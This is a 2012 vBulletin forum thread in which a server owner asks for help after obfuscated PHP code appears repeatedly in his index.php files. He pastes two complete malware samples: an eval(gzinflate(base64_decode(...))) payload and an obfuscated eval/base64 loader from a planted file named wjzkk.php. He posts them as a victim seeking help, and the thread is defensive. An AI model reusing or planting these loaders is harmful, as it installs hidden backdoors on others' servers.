HELP!!! - code injected into all my index.php files somehow

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • SloppyGoat
    Senior Member
    • Feb 2002
    • 674

    HELP!!! - code injected into all my index.php files somehow

    This has happened a few times now. Can someone tell me how this code keeps getting injected into my index.php files? It disables the forum. Seems easy enough to remove, but I've been hit with it like 3 times now, and I need to figure out why and how to stop this! Can anyone tell me where this is coming from and how to secure my server/forum?

    This was at the top of my main index.php file...and just about all other index.php files.

    PHP Code:
    <?php eval(gzinflate(base64_decode('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')));?>
    Last edited by SloppyGoat; Sat 24 Nov '12, 8:47am.
    The Grey Area - Tweaking Obsession
  • Lynne
    Former vBulletin Support
    • Oct 2004
    • 26255

    #2
    Have you and your host checked your access_logs and server logs to see exactly how they are going about doing this? Even if you fix it, if you don't know how they are doing it, they will just continue to do it over and over again.

    Please don't PM or VM me for support - I only help out in the threads.
    vBulletin Manual & vBulletin 4.0 Code Documentation (API)
    Want help modifying your vbulletin forum? Head on over to vbulletin.org
    If I post CSS and you don't know where it goes, throw it into the additional.css template.

    W3Schools &lt;- awesome site for html/css help

    Comment

    • SloppyGoat
      Senior Member
      • Feb 2002
      • 674

      #3
      Yep, and I'm seeing event logs like this, which aren't very helpful in any way. Most have little if no info. It's a bunch of 540 and 538 events. It's been over 13 years since I've had any serious problems, so I thought I was pretty secure, but now this. GRRRRRR!!!! What else can I check? It's a IIS server, BTW.

      Event Type: Success Audit
      Event Source: Security
      Event Category: Logon/Logoff
      Event ID: 540
      Date: 11/23/2012
      Time: 6:46:28 PM
      User: NT AUTHORITY\ANONYMOUS LOGON
      Computer: TGA
      Description:
      Successful Network Logon:
      User Name:
      Domain:
      Logon ID: (0x0,0x1494E)
      Logon Type: 3
      Logon Process: NtLmSsp
      Authentication Package: NTLM
      Workstation Name:
      Logon GUID: -
      Caller User Name: -
      Caller Domain: -
      Caller Logon ID: -
      Caller Process ID: -
      Transited Services: -
      Source Network Address: -
      Source Port: -
      The Grey Area - Tweaking Obsession

      Comment

      • Lynne
        Former vBulletin Support
        • Oct 2004
        • 26255

        #4
        Nothing is showing in your access_logs or server logs? (What you posted is not the access_log or the server log.)

        edit: Whoops, just saw it is Windows.

        How about your control panel logs in the admincp? Is someone else login in as an admin and doing anything? Is your host helping out with this?

        Please don't PM or VM me for support - I only help out in the threads.
        vBulletin Manual & vBulletin 4.0 Code Documentation (API)
        Want help modifying your vbulletin forum? Head on over to vbulletin.org
        If I post CSS and you don't know where it goes, throw it into the additional.css template.

        W3Schools &lt;- awesome site for html/css help

        Comment

        • SloppyGoat
          Senior Member
          • Feb 2002
          • 674

          #5
          It's my own server. I have no host. No unknown log ins on the forum. CP shows nothing unusual. It's like the forum hasn't been touched...just the index.php files only.
          The Grey Area - Tweaking Obsession

          Comment

          • Lynne
            Former vBulletin Support
            • Oct 2004
            • 26255

            #6
            If files were touched, then somebody was able to login to the server and change them. So, you must have a log of that somewhere. (Or perhaps you aren't logging all server activity?)

            Please don't PM or VM me for support - I only help out in the threads.
            vBulletin Manual & vBulletin 4.0 Code Documentation (API)
            Want help modifying your vbulletin forum? Head on over to vbulletin.org
            If I post CSS and you don't know where it goes, throw it into the additional.css template.

            W3Schools &lt;- awesome site for html/css help

            Comment

            • beishe8
              Senior Member
              • Oct 2005
              • 6782
              • 4.2.X

              #7
              They could find their way through some of the vB modifications.
              or
              Some other scripts on your server.
              or
              Some virus on your computer(server)...


              vB5 is unequivocally the best forum software, but not yet...

              Comment

              • SloppyGoat
                Senior Member
                • Feb 2002
                • 674

                #8
                Well, Win Server has is the security event log, and it's full of empty anonymous logons, which I unfortunately have not been monitoring lately, since there have been no attacks for a long time now. Anything else I should look for on a Win 2003 Server? There is so much sh*t in the W3SVC1 log files that I have no idea what to even look for. It logs everything. There are tons of IP's and other info that doesn't seem helpful, but just more confusing. Want to see the W3 log files for those days? There's really just far too much info in there to make any sense to me.
                The Grey Area - Tweaking Obsession

                Comment

                • beishe8
                  Senior Member
                  • Oct 2005
                  • 6782
                  • 4.2.X

                  #9
                  Sorry,I'm not familiar with Win servers at all,have no clue what could have happened there.


                  vB5 is unequivocally the best forum software, but not yet...

                  Comment

                  • betterthanyours
                    Senior Member
                    • May 2012
                    • 110

                    #10
                    You should post the logs and disable anonymous login.
                    http://www.unrealkillers.com | unrealtournament 1999 | siege | combogib | bunnytrack | instagib ctf

                    Comment

                    • SloppyGoat
                      Senior Member
                      • Feb 2002
                      • 674

                      #11
                      Anonymous login is disabled. Only IUSR (Inet guest account) and IWAM (Launch IIS process account) are enabled besides the ASP.net account. Other than that, only my renamed Admin account is enabled. I'm pretty damn sure that is the bare minimum for an IIS website?
                      The Grey Area - Tweaking Obsession

                      Comment

                      • SloppyGoat
                        Senior Member
                        • Feb 2002
                        • 674

                        #12
                        Can anyone decode this crap, or help me figure out how to defend from it?

                        Malicious code found in index.php files.

                        PHP Code:
                        <?php eval(gzinflate(base64_decode('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')));?>
                        Code found in some file named, "wjzkk.php".

                        PHP Code:
                        <?php /*@(7H*/eval/*M2c*/(/*i=yS*/base64_decode/*KAALX*/(/*mPp! g*/'Lyp7UEhjKi9ldmFsLypaTHpCbD0qLygvKjhnTSU1SSovYmFzZTY0X2RlY29kZS8qVHY6QiovKC8qeklTKi8nTHlvME5pQmV'/*q[R*/./*(P-*/'LaTlwWmk4cVduZ21UV0J3S2k4b0x5cGZmSDVnS2k5cGMzTmxkQzhxZGl4R1dpb3ZLQzhxYkY5VFJpb3ZKRjlTUlZGVlJWTl'/*;gs gl*/./*}5u@*/'VMeScvKl9BTW52Ki8uLypFVDJlcyovJ28rVDN3K0szbGpLaTliTHlwWU5Vc2hWeW92SjJFbkx5bzVNa3RPTFVZcUx5NHZLb'/*D{gM1i*/./*w>zO.*/'XhqWlVrcUx5ZHpKeThxWXpNMmJ5b3ZMaThxT3oxQVp5b3YnLyole2AmQSovLi8qUnZCWVIqLydKMk1uTHlweFdtaFNLaTlk'/*;&~IP*/./*0^@&F*/'THlwb1NUMUVLaTh2S2xNM0pUbFZWeW92S1M4cVhFbytieTBuS2k4dktsTWdlMUJSWkNvdktTOHFaVmN1WGx3cUwyJy8qcTQ'/*8lH?B5!NX*/./*+@_c1*/'2WTNNKi8uLyo4enUqLydWMllXd3ZLbFZGUDA4cUx5Z3ZLbFo5SmtoRUtpOXpkSEpwY0hOc1lYTm9aWE12S25kT1RHZERRRn'/*4Wb*/./*>R r-*/'NxTHlndktqb2xZQ0FxTHlSZlVrVlJWVVZUJy8qWn54LEVHUDE4Ki8uLypzQy4qLydWQzhxYkRkbUtpOWJMeW9uUG50VUpTd'/*e6gZ6J*/./*>(ACFZ*/'FlaQ292SjJFbkx5cElZREptV0ZKbktpOHVMeXBDZm4xNU9Db3ZKM05qSnk4cVkyNThLaTlkTHlvNWRFJy8qUXJJUWUqLy4v'/*D2[8*/./*6,a^*/'Kkk4b2MqLydvNFdTb3ZMeW95VEc4aEtpOHBMeXBrT0ZwMExTb3ZMeW82V3pwblhTb3ZLUzhxWFZ0ZVh5b3ZMeXBlWVZrZ1Z'/*GD-[Q{=*/./*I^_ */'pWXFMenN2S2o1TVJUUXFMdz09Jy8qSjZyKi8pLyohbStoLCovLypBN14mJlw6Ki8pLypnIWEqLy8qIFhgMCovOy8qTXhvdyov'/*ae,*/)/*8JW1*//*B'dm*/)/*>[jH*//*r(S`m*/;/*A7ml*/ ?>
                        The Grey Area - Tweaking Obsession

                        Comment

                        • Lynne
                          Former vBulletin Support
                          • Oct 2004
                          • 26255

                          #13
                          We wouldn't want it posted here if we did decode it. You can just google the eval part and get a decoder for it.

                          Please don't PM or VM me for support - I only help out in the threads.
                          vBulletin Manual & vBulletin 4.0 Code Documentation (API)
                          Want help modifying your vbulletin forum? Head on over to vbulletin.org
                          If I post CSS and you don't know where it goes, throw it into the additional.css template.

                          W3Schools &lt;- awesome site for html/css help

                          Comment

                          • SloppyGoat
                            Senior Member
                            • Feb 2002
                            • 674

                            #14
                            I don't know enough to about it to figure it out. I've already tried. As long as you remove php from the beginning, or you're not running a php server, then isn't it harmless anyway? It's not a virus. It's just some crappy code that I suspect reroutes my server to spam someone else with their BS. But without some help, I don't guess I'll ever know.
                            The Grey Area - Tweaking Obsession

                            Comment

                            • borbole
                              Senior Member
                              • Feb 2010
                              • 3074
                              • 4.0.0

                              #15
                              You might want to hire an expert to look into this then.

                              I don''t know if this is type of thing is included in the vb support, but you can start a ticket at your client center here and see if one of the vb staff can take a look into this for you.

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...